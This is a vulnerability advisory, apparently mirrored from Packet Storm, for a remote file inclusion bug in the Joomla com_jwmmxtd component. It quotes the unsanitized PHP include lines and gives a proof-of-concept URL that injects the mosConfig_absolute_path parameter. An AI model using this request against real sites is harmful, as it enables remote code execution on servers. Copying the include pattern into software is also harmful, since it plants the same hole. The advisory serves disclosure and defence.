Lucene search
K

Joomla Jwmmxtd Remote File Inclusion

🗓️ 23 Mar 2010 00:00:00Reported by eidelweissType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Joomla Jwmmxtd Remote File Inclusion Vulnerability in com_jwmmxtd version 1.

Code
`#################################################################  
Joomla component com_jwmmxtd <= Remote File Inclusion Vulnerability  
#################################################################  
  
Info: "JW Media Manager XTD" (com_jwmmxtd) Administrator Component for Joomla! 1.0.x & Mambo 4.5.x/4.6.x  
Version: 1.2   
License: http://www.gnu.org/copyleft/gpl.html  
Page: http://www.joomlaworks.gr  
  
#################################################################  
  
Author: eidelweiss  
Contact: eidelweiss[at]cyberservices[dot]com  
Thanks: JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) - LeQhi - aRiee - idiot_inside - kuris  
Special: AL-MARHUM - [D]eal [C]yber - syabilla_putri (miss u)  
  
#################################################################  
  
-=[ BUG ]=-  
  
[+] admin.jwmmxtd.php  
  
-=[ VULN ]=-  
  
// Language File  
if (file_exists($mosConfig_absolute_path.'/administrator/components/'.JWMMXTD_COMP.'/language/'.$mosConfig_lang.'.php')) {  
include_once ($mosConfig_absolute_path.'/administrator/components/'.JWMMXTD_COMP.'/language/'.$mosConfig_lang.'.php');  
} else {  
include_once ($mosConfig_absolute_path.'/administrator/components/'.JWMMXTD_COMP.'/language/english.php');  
}  
  
// PCLZIP Library  
include_once ($mosConfig_absolute_path.'/administrator/components/'.JWMMXTD_COMP.'/lib/pclzip.class.php');  
  
-=[ P0C ]=-  
  
http://127.0.0.1/administrator/components/com_jwmmxtd/admin.jwmmxtd.php?mosConfig_absolute_path= [inj3ct0r]  
  
#################################################################  
[ FIX ] Use Your Skill and Play Your Imagination  
#################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation